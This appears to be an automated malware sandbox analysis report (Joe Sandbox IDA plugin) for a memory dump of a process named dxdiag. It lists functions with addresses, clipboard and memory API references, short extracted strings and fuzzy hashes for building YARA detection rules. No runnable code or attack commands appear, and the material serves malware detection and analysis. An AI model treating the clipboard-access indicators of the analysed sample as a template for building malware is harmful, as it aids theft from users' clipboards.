Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00430404
GetWindowLongW.USER32 ref: 00430429
GetClipboardData.USER32 ref: 00430439
GlobalLock.KERNEL32 ref: 00430452
GlobalUnlock.KERNEL32 ref: 00430578
CloseClipboard.USER32 ref: 00430583

Strings

m, xrefs: 004304D8
$, xrefs: 004304C4
o, xrefs: 004304E2
r, xrefs: 004304DD
#, xrefs: 004304CE
!, xrefs: 004304BA

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: !$#$$$m$o$r
API String ID: 2832541153-1228291082
Opcode ID: 9aabbc75b445cbdc09f20715aaa2dda78bd6a68a7388c67d93f533054e1a149d
Instruction ID: 5f04a8027e3d7a55f1d66e97924e677b1801266d210010e4a128a03f4dc74b7a
Opcode Fuzzy Hash: 9aabbc75b445cbdc09f20715aaa2dda78bd6a68a7388c67d93f533054e1a149d
Instruction Fuzzy Hash: CC41907160C3818FD300EF78959935EBFE0AB95308F08593EE4C987292D6BD85499B5B

Function 0041676A Relevance: 20.4, Strings: 16, Instructions: 364COMMON

Download Yara Rule

Strings

M*T,, xrefs: 0041685E
M"`$, xrefs: 00416874
G6DH, xrefs: 004168AB
C>K0, xrefs: 00416895
<F9X, xrefs: 004168D7
0J4L, xrefs: 004168B6
-R?T, xrefs: 004168F8
Z.\ , xrefs: 00416869
3N#@, xrefs: 004168C1
<^#P, xrefs: 004168ED
RT, xrefs: 004169C1
P&U8, xrefs: 0041687F
g2V4, xrefs: 004168A0
*Z/\, xrefs: 004168E2
UV, xrefs: 00416903
K:^<, xrefs: 0041688A

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: *Z/\$-R?T$0J4L$3N#@$<F9X$<^#P$C>K0$G6DH$K:^<$M"`$$M*T,$P&U8$UV$Z.\ $g2V4$RT
API String ID: 0-3486322482
Opcode ID: ce30911c56949484c871613a9b58aee768a7c3ed8897db213ed400ca2e5a3e73
Instruction ID: bfdc5e733220a4266b0cee0809eb26845f7d15cd3bd46db4d77d1dfb423e5921
Opcode Fuzzy Hash: ce30911c56949484c871613a9b58aee768a7c3ed8897db213ed400ca2e5a3e73
Instruction Fuzzy Hash: 14B199B45093918BD7348F29C4907EBBBE0AF96304F558A2DD8C95B390DB798885CB87

Function 0040B124 Relevance: 19.1, Strings: 15, Instructions: 302COMMON

Download Yara Rule

Strings

i]m_, xrefs: 0040B1FD
HiBk, xrefs: 0040B212
W;, xrefs: 0040B4C3
8I&K, xrefs: 0040B1DA
$q?s, xrefs: 0040B220
'm&o, xrefs: 0040B219
=?, xrefs: 0040B1C5
8uZw, xrefs: 0040B22A
5Q0S, xrefs: 0040B1E8
{-G/, xrefs: 0040B1A9
,Yu[, xrefs: 0040B1F6
WaLc, xrefs: 0040B204
iAbC, xrefs: 0040B1CC
O;, xrefs: 0040B490
WePg, xrefs: 0040B20B

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: =?$$q?s$'m&o$,Yu[$5Q0S$8I&K$8uZw$HiBk$O;$W;$WaLc$WePg$iAbC$i]m_${-G/
API String ID: 0-2287720743
Opcode ID: a8e193ca5121b7fe708194ddb65a1b39536846b7ffe5ce25fb94a828c6cf7a23
Instruction ID: 29238d0ecd9fd652967a2f07aa34a714a27bdb8438f077e70085c6c9b953e65e
Opcode Fuzzy Hash: a8e193ca5121b7fe708194ddb65a1b39536846b7ffe5ce25fb94a828c6cf7a23
Instruction Fuzzy Hash: BAC1ABB4200301CFDB288F25D8917567BA1FB45310F2586BDDC5A9F29ADB34D842CF94

Function 0041DA80 Relevance: 15.9, Strings: 12, Instructions: 904COMMON

Download Yara Rule

Strings

ubk$, xrefs: 0041DE5F
R_QQ, xrefs: 0041E1A5
e, xrefs: 0041E1B5
UaUQ, xrefs: 0041DDF7
[]SN, xrefs: 0041DE0F
AHAq, xrefs: 0041DE17
}nn~, xrefs: 0041DE6A
ASSU, xrefs: 0041E1AD
R][j, xrefs: 0041DC9D
bs$, xrefs: 0041E493
_s$, xrefs: 0041E45D
1>?<, xrefs: 0041E1F6

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 1>?<$AHAq$ASSU$R][j$R_QQ$UaUQ$[]SN$_s$$bs$$e$ubk$$}nn~
API String ID: 0-3156591309
Opcode ID: 84e542dcf362c4722633b38991b48ed42a758c2a9ed69d5e91c7dd3c190ae891
Instruction ID: cb5f53731036b88b860b65b87d3060a00e5eb7a07e2cb5fd5f7d8ae11adf455f
Opcode Fuzzy Hash: 84e542dcf362c4722633b38991b48ed42a758c2a9ed69d5e91c7dd3c190ae891
Instruction Fuzzy Hash: 8852577590C3518FC725CF25C8407ABBBE1AF86304F084A6DE8E59B382D739D906CB96

Function 00425800 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 444COMMON

Download Yara Rule

Strings

BdB, xrefs: 00426434
~bB, xrefs: 00426278, 004264EC, 00426800
7Wu, xrefs: 0042624B
r`B, xrefs: 00426065
jdB, xrefs: 00426464
<=, xrefs: 0042620F

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: <=$BdB$jdB$r`B$~bB$7Wu
API String ID: 0-3743820354
Opcode ID: 7283b4ef89dd7f4654847078150be036275240888603589d3de15dc1c6c1ce9b
Instruction ID: 340aef6d2692e72857662edcd36e925b24db6bbbcaf4b5bc792621142b15778b
Opcode Fuzzy Hash: 7283b4ef89dd7f4654847078150be036275240888603589d3de15dc1c6c1ce9b
Instruction Fuzzy Hash: 82E123B560C3808BD734DF24D85276BBBE1FB82314F05892DE0D69B352EB798501CB8A

Function 00419710 Relevance: 11.7, APIs: 2, Strings: 4, Instructions: 1213COMMON

Download Yara Rule

APIs

Part of subcall function 00439E40: LdrInitializeThunk.NTDLL(0043C1EB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E6E

FreeLibrary.KERNEL32(?), ref: 00419CA6
FreeLibrary.KERNEL32(?), ref: 00419D0B

Strings

Wu, xrefs: 00419CA6, 00419D0B
I,~M, xrefs: 0041A423
J,I., xrefs: 00419A90
ST, xrefs: 00419A7D

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: I,~M$J,I.$ST$Wu
API String ID: 764372645-1860371270
Opcode ID: d890d32fbb13f0df0ad3a9381c1ff360bd9b398ea0201f9c1d6794e8eacfa1d7
Instruction ID: 3a946de6d06df9888b19065ab5da8f4f8076a039cb09845347bca5e298d55306
Opcode Fuzzy Hash: d890d32fbb13f0df0ad3a9381c1ff360bd9b398ea0201f9c1d6794e8eacfa1d7
Instruction Fuzzy Hash: ED8229746083409BE714DF24D890BAFBBE2EBD6314F28892DE58547392D779DC81CB4A

Function 00417742 Relevance: 10.5, Strings: 8, Instructions: 526COMMON

Download Yara Rule

Strings

A}A, xrefs: 00417D3B
H, xrefs: 00417ADD
cp, xrefs: 004178F5
), xrefs: 00417B89
N, xrefs: 00417AE4, 00417B28
ts, xrefs: 004178FD
C, xrefs: 00417905
h{A, xrefs: 00417B47, 00417B61

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: )$A}A$C$H$N$cp$h{A$ts
API String ID: 0-2460436281
Opcode ID: e72cfd5e58267174583cb2aefa18fb3aa2280ca7967e1c0677e4e59f799665dc
Instruction ID: c091a61c3610e84d45043be11fa95010c19d3da449df3a573e39c3d9f215f14f
Opcode Fuzzy Hash: e72cfd5e58267174583cb2aefa18fb3aa2280ca7967e1c0677e4e59f799665dc
Instruction Fuzzy Hash: EFF14375A083518BD714DF28C8906ABB7F2FFD5314F188A2DE4C98B391EB389941C796

Function 004092D0 Relevance: 10.4, Strings: 8, Instructions: 436COMMON

Download Yara Rule

Strings

ca}`, xrefs: 004093B6
f}oe, xrefs: 004093A6
^=, xrefs: 0040940E
, xrefs: 004096EE
zE, xrefs: 00409463
v, xrefs: 00409321
QS`, xrefs: 00409655
LS`, xrefs: 0040969B

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: LS`$QS`$^=$ca}`$f}oe$v$zE$
API String ID: 0-1738842590
Opcode ID: 3b1b216516dbc741a7d0b8159a95c0c4f5c0bb8da2b18092da4a11f8244ac20c
Instruction ID: 8397652dd6c80c3d6384abaef94ac051be11649c1be440025a567e8f984c36e4
Opcode Fuzzy Hash: 3b1b216516dbc741a7d0b8159a95c0c4f5c0bb8da2b18092da4a11f8244ac20c
Instruction Fuzzy Hash: C0C1E77260C3918BC326CF69849076BFFE1AF96310F094A6DE4D55B382D3798D0AC796

Function 00427365 Relevance: 10.3, Strings: 8, Instructions: 338COMMON

Download Yara Rule

Strings

'I8K, xrefs: 0042743E
*O, xrefs: 004274D8
7E%G, xrefs: 00427436
(MO, xrefs: 00427446
!YZ[, xrefs: 0042745E
vw, xrefs: 004274EC
5U$W, xrefs: 00427456
1Q<S, xrefs: 0042744E

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: !YZ[$'I8K$(MO$*O$1Q<S$5U$W$7E%G$vw
API String ID: 0-110145457
Opcode ID: 9732b06a73e385f885b5dbe102d8aac1c51981338c974522d8cbeaa61a1d13e9
Instruction ID: 1450f61bfb5304e21163cb8565421a3d7c92680fc4378e386598e8c3f998bcbb
Opcode Fuzzy Hash: 9732b06a73e385f885b5dbe102d8aac1c51981338c974522d8cbeaa61a1d13e9
Instruction Fuzzy Hash: B2B1C1B6A1C3618BC724CF19A84166BB7F1EFC1304F14882DE9899B341E778D50ACB86

Function 0042456F Relevance: 9.1, Strings: 7, Instructions: 366COMMON

Download Yara Rule

Strings

]VWC, xrefs: 0042497B
. &., xrefs: 004249AC
,.-(, xrefs: 00424996
?c:7, xrefs: 004249B7
QVTH, xrefs: 00424983
$Q, xrefs: 004249C2
qAB_, xrefs: 0042478F, 0042479F

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: $Q$,.-($. &.$?c:7$QVTH$]VWC$qAB_
API String ID: 0-2163668455
Opcode ID: ca1b7030970def91fcc269924cbecb74bf813ef76d999bb66b241e4d17540760
Instruction ID: d19ded286c5482f05c95a3e280dd030e35027ba8af5a7be08d79747085adfcff
Opcode Fuzzy Hash: ca1b7030970def91fcc269924cbecb74bf813ef76d999bb66b241e4d17540760
Instruction Fuzzy Hash: 99B179717083A18BD724CB34A4412EBB7D1DFD6300F948A2FD9998B382E338D905D79A

Function 004281C0 Relevance: 8.2, Strings: 6, Instructions: 665COMMON

Download Yara Rule

Strings

%R6T, xrefs: 0042820E
=N?@, xrefs: 004281EB
jPl, xrefs: 0042821C
|Z7\, xrefs: 00428200
%V6h, xrefs: 00428215
1F&X, xrefs: 004281F9

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: jPl$%R6T$%V6h$1F&X$=N?@$|Z7\
API String ID: 0-720933595
Opcode ID: 774de880706ee3f8471cdb5d7e1680f0c02cd5f6432aacaaaaf0103cd51c3b9f
Instruction ID: f39d86c070ab500bf256f0a98519923189adf886995b2a16e0c98b1acc46fafb
Opcode Fuzzy Hash: 774de880706ee3f8471cdb5d7e1680f0c02cd5f6432aacaaaaf0103cd51c3b9f
Instruction Fuzzy Hash: F4227A75A04255CFDB04CF68E8817AEBBB2FF4A310F68416DE441AB392DB399D01CB58

Function 0041AFD8 Relevance: 7.7, Strings: 6, Instructions: 153COMMON

Download Yara Rule

Strings

|ed, xrefs: 0041B114
gdk|, xrefs: 0041B11C
oscd, xrefs: 0041B104
a+ab, xrefs: 0041B10C
G, xrefs: 0041B012
2l, xrefs: 0041B124

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 2l$G$a+ab$gdk|$oscd$|ed
API String ID: 0-3137366845
Opcode ID: 411c911b66ffff2e9b30ef3c3b7db8ad7d55e8e77a8e129a3cd9494ef06f664d
Instruction ID: 2b51620a84509c9e7f89b2250eaa4d1d77fcbe22bbd39bf4a7e45a94f0a53178
Opcode Fuzzy Hash: 411c911b66ffff2e9b30ef3c3b7db8ad7d55e8e77a8e129a3cd9494ef06f664d
Instruction Fuzzy Hash: 76415872A483904BD318CF69C89239BBFE2EB96304F04496DF5C597381D7BAC9058B86

Function 0042683C Relevance: 6.8, Strings: 5, Instructions: 527COMMON

Download Yara Rule

Strings

", xrefs: 00426EA2
2lB, xrefs: 00426C2C
nB, xrefs: 00426D8C
bpB, xrefs: 00426FE2
2pB, xrefs: 00426FDC

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: nB$"$2lB$2pB$bpB
API String ID: 0-1940457101
Opcode ID: 8de7e067c5cac23f0f4fd2df2c49999167b566e3c728dc8f48f6de7cf320b789
Instruction ID: 558fbc4cb8a2958d1f7e7249d7ccc9316d198c96dd93b6a73ccfed5fe5d12803
Opcode Fuzzy Hash: 8de7e067c5cac23f0f4fd2df2c49999167b566e3c728dc8f48f6de7cf320b789
Instruction Fuzzy Hash: 6B020375608351CFD714DF28D88032AFBE2BF9A320F198A6DE4A5873E1E778D9058B45

Function 00424DD0 Relevance: 6.6, Strings: 5, Instructions: 369COMMON

Download Yara Rule

Strings

^E, xrefs: 00424E67
Z[, xrefs: 00424E7F
pqr, xrefs: 00424F87
,Y, xrefs: 00424E77
V,, xrefs: 00424E6F

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: ,Y$V,$Z[$^E$pqr
API String ID: 0-279934592
Opcode ID: 87f78cd21d4e01dd81e271a37c7c4b9a528862636fb1b6678b2c431f50833107
Instruction ID: 5742babc61ebacdb7949157f0bd4e01d84a0f7fb4511d1348a61e7c30121f0f1
Opcode Fuzzy Hash: 87f78cd21d4e01dd81e271a37c7c4b9a528862636fb1b6678b2c431f50833107
Instruction Fuzzy Hash: E2D10FB4608341DFE724CF20E881B6FBBA0FB86704F94892DE68597391D778D905CB4A

Function 00409730 Relevance: 5.4, Strings: 4, Instructions: 352COMMON

Download Yara Rule

Strings

FD089AA551ECCED45EC6468C5C963249, xrefs: 004097E0
&', xrefs: 00409AE3
rt, xrefs: 004099B0
53/L, xrefs: 00409831

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: &'$53/L$FD089AA551ECCED45EC6468C5C963249$rt
API String ID: 0-3412296137
Opcode ID: 3d479a76f3ed01d2210f7306c98ef1b6a839f767a8772c77676ee1babf76fe85
Instruction ID: c43cc0f4767f0386331e86a65d878f221811e9f74dfb90e72f7e2679060c6ec5
Opcode Fuzzy Hash: 3d479a76f3ed01d2210f7306c98ef1b6a839f767a8772c77676ee1babf76fe85
Instruction Fuzzy Hash: 19A100B050C3808BD314DF358890A6FBBE4EF92314F14496DE1E69B3A2D738D90ACB56

Function 0041BB20 Relevance: 5.3, Strings: 4, Instructions: 310COMMON

Download Yara Rule

Strings

KT, xrefs: 0041BD42
stu, xrefs: 0041BC18
OM, xrefs: 0041BD52
LM, xrefs: 0041BCA8

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: KT$LM$OM$stu
API String ID: 0-2300950273
Opcode ID: a0c85d8ade89f4d732e1c7db4051fb16378b39335d085899007dfca62cd4281c
Instruction ID: e0790f8a2260445ed915882484265c43d046fe5b7e2851accbdc848ea5d765e3
Opcode Fuzzy Hash: a0c85d8ade89f4d732e1c7db4051fb16378b39335d085899007dfca62cd4281c
Instruction Fuzzy Hash: 37A1BC7660C3449BD704EF26D8914AFBBF6EB96310F444C2DF4D687342D6398A098B9A

Function 00419219 Relevance: 5.3, Strings: 4, Instructions: 274COMMON

Download Yara Rule

Strings

KL, xrefs: 00418F6D
D, xrefs: 0041920A
`, xrefs: 00418E50
.tv, xrefs: 00418F08

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: .tv$D$KL$`
API String ID: 0-1798403091
Opcode ID: 90e57625ad38b70126a8750b87c4af5a01a1fc3e7287f70fed15274c53c4e676
Instruction ID: 3f30fe60f5f3189d76d806e3d19590f01995e251e5eb8f492cdef6a97151cc10
Opcode Fuzzy Hash: 90e57625ad38b70126a8750b87c4af5a01a1fc3e7287f70fed15274c53c4e676
Instruction Fuzzy Hash: 4291ABB04083918BE334CF24C4A57ABBBE1FF86314F158A5DD4C94B392D7798885CB9A

Function 00421D73 Relevance: 4.5, Strings: 3, Instructions: 737COMMON

Download Yara Rule

Strings

2-:., xrefs: 00421F08
#'!7, xrefs: 00421E3F
<r/+, xrefs: 00421E47

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: #'!7$2-:.$<r/+
API String ID: 0-1588113804
Opcode ID: 1223cc3a21a772a0d2f2494d54565a2756d6f36c6719582f613429b6c81c700c
Instruction ID: f9fba50b878ae6ca9efe469270682ac7877d2de3c9241f307d5b60eb0439a20b
Opcode Fuzzy Hash: 1223cc3a21a772a0d2f2494d54565a2756d6f36c6719582f613429b6c81c700c
Instruction Fuzzy Hash: 14322276A08212CFD318CF28DC9166AB3E2FF89314F49853DE99597390D7B8D901CB85

Function 00416F7C Relevance: 4.3, Strings: 3, Instructions: 506COMMON

Download Yara Rule

Strings

+, xrefs: 00416FFE
W, xrefs: 0041768A
QWj, xrefs: 004175C3

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: +$QWj$W
API String ID: 0-3739570015
Opcode ID: f03c26e0e61ad76241ec77b420eb465f03cfdda98418e8febe6a45b60db9b282
Instruction ID: 69a98fb83b870544fd8d41a8c5e62acc4f3576c5134d378220855062fcb6874c
Opcode Fuzzy Hash: f03c26e0e61ad76241ec77b420eb465f03cfdda98418e8febe6a45b60db9b282
Instruction Fuzzy Hash: F1F114719083118BD324CF25C8907ABB7F1FF89710F198A6EE8C997351E7789941CB5A

Function 0042779B Relevance: 4.2, Strings: 3, Instructions: 443COMMON

Download Yara Rule

Strings

9, xrefs: 00427A62
yz, xrefs: 004279C2
9, xrefs: 00427A26, 004279DD

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 9$9$yz
API String ID: 0-3458379945
Opcode ID: 97e5fe8962bbb79f1b9a7ddb6f8aa47842b1dc16bf743edd73e6bddcf6dbf477
Instruction ID: 8cb2bd10700cf6573130ed67dfada133875a43ff1573faf34ad6f8871ffd4bd0
Opcode Fuzzy Hash: 97e5fe8962bbb79f1b9a7ddb6f8aa47842b1dc16bf743edd73e6bddcf6dbf477
Instruction Fuzzy Hash: C2C130B6A0C3118BC714DF68D85262BB3F1EFC1314F18892EE4D69B391E7789A05C75A

Function 004277E0 Relevance: 4.2, Strings: 3, Instructions: 436COMMON

Download Yara Rule

Strings

9, xrefs: 00427A62
yz, xrefs: 004279C2
9, xrefs: 00427A26, 004279DD

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 9$9$yz
API String ID: 0-3458379945
Opcode ID: 1ca6f33f7db7d5da2e48699969a0ed4e89dc9ac7e0041adc56acc3958d548636
Instruction ID: bbb38220efc2b624f5925e2889de6455b8c212916dff37784df4ba08f5a7ac67
Opcode Fuzzy Hash: 1ca6f33f7db7d5da2e48699969a0ed4e89dc9ac7e0041adc56acc3958d548636
Instruction Fuzzy Hash: ABC120B660C3118BC7249F68D85262BB3F1EFC1314F18892EE4D69B391E7789A05C75A

Function 00436BE4 Relevance: 4.2, Strings: 3, Instructions: 426COMMON

Download Yara Rule

Strings

x#X%, xrefs: 00436E95
&', xrefs: 00436E82
:, xrefs: 004370D4

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: &'$:$x#X%
API String ID: 0-3823454105
Opcode ID: 6afc1bf7648736bdd623afcef6bc591dcf5bfd5d666ccb6253b7929a179191ea
Instruction ID: 8f3827cfcbc4e38f67a50f9a1e96b6c0906f4e5a80d62fafde117fdb12ab2f56
Opcode Fuzzy Hash: 6afc1bf7648736bdd623afcef6bc591dcf5bfd5d666ccb6253b7929a179191ea
Instruction Fuzzy Hash: A4D1277A618652CBCB185F24E86237B73E1FF4A745F0B807ED482872A1EB798950CB45

Function 00415460 Relevance: 4.2, Strings: 3, Instructions: 408COMMON

Download Yara Rule

Strings

pYA, xrefs: 0041596A
pw, xrefs: 004156C2
OG, xrefs: 004156CD

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: OG$pYA$pw
API String ID: 0-4264688152
Opcode ID: 6415562d6c1008e6fe1d99e2b67bdb73ebf9c9cca06134cedbe07d6db5d92b51
Instruction ID: 4159aafd9c10dcdb92f5b7ab8577220b838cb96e890b31dd2f5e1bbf81f70fed
Opcode Fuzzy Hash: 6415562d6c1008e6fe1d99e2b67bdb73ebf9c9cca06134cedbe07d6db5d92b51
Instruction Fuzzy Hash: 3DC12374548341CBD7349F24D891BEB73A1EF96314F044A3DE4D98B3A1EB389981CB9A

Function 0042A9D5 Relevance: 4.1, Strings: 3, Instructions: 388COMMON

Download Yara Rule

Strings

ztbk, xrefs: 0042AD34
d, xrefs: 0042ABAD
X\j_, xrefs: 0042AC49

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: X\j_$d$ztbk
API String ID: 0-161409437
Opcode ID: 178e0c69511cf786b98128b254f0426a957d5df6ad6af87ce70e9a0989f1dd82
Instruction ID: c647836b6919da90344013ba879caa2c0c0a118e64d05fdf5bbca9858e4c4854
Opcode Fuzzy Hash: 178e0c69511cf786b98128b254f0426a957d5df6ad6af87ce70e9a0989f1dd82
Instruction Fuzzy Hash: 7DB146712047918FD329CF29C450723FBE2AF86300F69C69EC8D68B796C678E802CB55

Function 0042AA8A Relevance: 4.1, Strings: 3, Instructions: 365COMMON

Download Yara Rule

Strings

ztbk, xrefs: 0042AD34
d, xrefs: 0042ABAD
X\j_, xrefs: 0042AC49

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: X\j_$d$ztbk
API String ID: 0-161409437
Opcode ID: c138dd2b7c66af969763d4e987df7e41070ed8ccd11516e73ecb22322106a9ee
Instruction ID: 63ec9625d8e1e38da1926b311d6272fb904936b9087af233feddb224084f3342
Opcode Fuzzy Hash: c138dd2b7c66af969763d4e987df7e41070ed8ccd11516e73ecb22322106a9ee
Instruction Fuzzy Hash: A9A158712047918FD329CF29C450722FBE2AF86304F69C69EC9D68B792C778D812CB55

Function 0042AAD7 Relevance: 4.1, Strings: 3, Instructions: 364COMMON

Download Yara Rule

Strings

ztbk, xrefs: 0042AD34
d, xrefs: 0042ABAD
X\j_, xrefs: 0042AC49

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: X\j_$d$ztbk
API String ID: 0-161409437
Opcode ID: 14fc744518a8a4fa68d9e00823f089d1af0127733397b98013bd6eb39e02983f
Instruction ID: 69c4823cc23e329729b65d6cd6aa0dd4aae8d762435b1c1a1192b9f4453f2a0f
Opcode Fuzzy Hash: 14fc744518a8a4fa68d9e00823f089d1af0127733397b98013bd6eb39e02983f
Instruction Fuzzy Hash: D6A148712047918FD329CF29C490722FBE2AF86304F69C69EC9D68B792C779D842CB55

Function 0042AAC6 Relevance: 4.1, Strings: 3, Instructions: 339COMMON

Download Yara Rule

Strings

ztbk, xrefs: 0042AD34
d, xrefs: 0042ABAD
X\j_, xrefs: 0042AC49

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: X\j_$d$ztbk
API String ID: 0-161409437
Opcode ID: b044eee7a262e571ea12573e6cf26b9f4d54e30ac2eb5059c67a4872f77a546c
Instruction ID: b77578477651018fdeaac84c335eda1cf7dbe90ebbcab35e646ae95f6ad1400d
Opcode Fuzzy Hash: b044eee7a262e571ea12573e6cf26b9f4d54e30ac2eb5059c67a4872f77a546c
Instruction Fuzzy Hash: 17A168712047918FD325CF29C490722FBE2AF96300F6D869EC4D68B786C778D802CB65

Function 004230C0 Relevance: 4.0, Strings: 3, Instructions: 285COMMON

Download Yara Rule

Strings

3zx[, xrefs: 00422EBA
@B, xrefs: 004230FA
qzx[, xrefs: 00422EE0

Memory Dump Source

Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd

Similarity

API ID:
String ID: 3zx[$qzx[$@B
API String ID: 0-149612330
Opcode ID: 17b5d7aecd68ee84dfd04b24f533ecaaf5dbf0cb7ca230442a63f74c25e47d9e
Instruction ID: 9e4b87dcb06e457d0f9d11912b9a92467ef5426d1500ae2c30e3006a4d20d98e
Opcode Fuzzy Hash: 17b5d7aecd68ee84dfd04b24f533ecaaf5dbf0cb7ca230442a63f74c25e47d9e
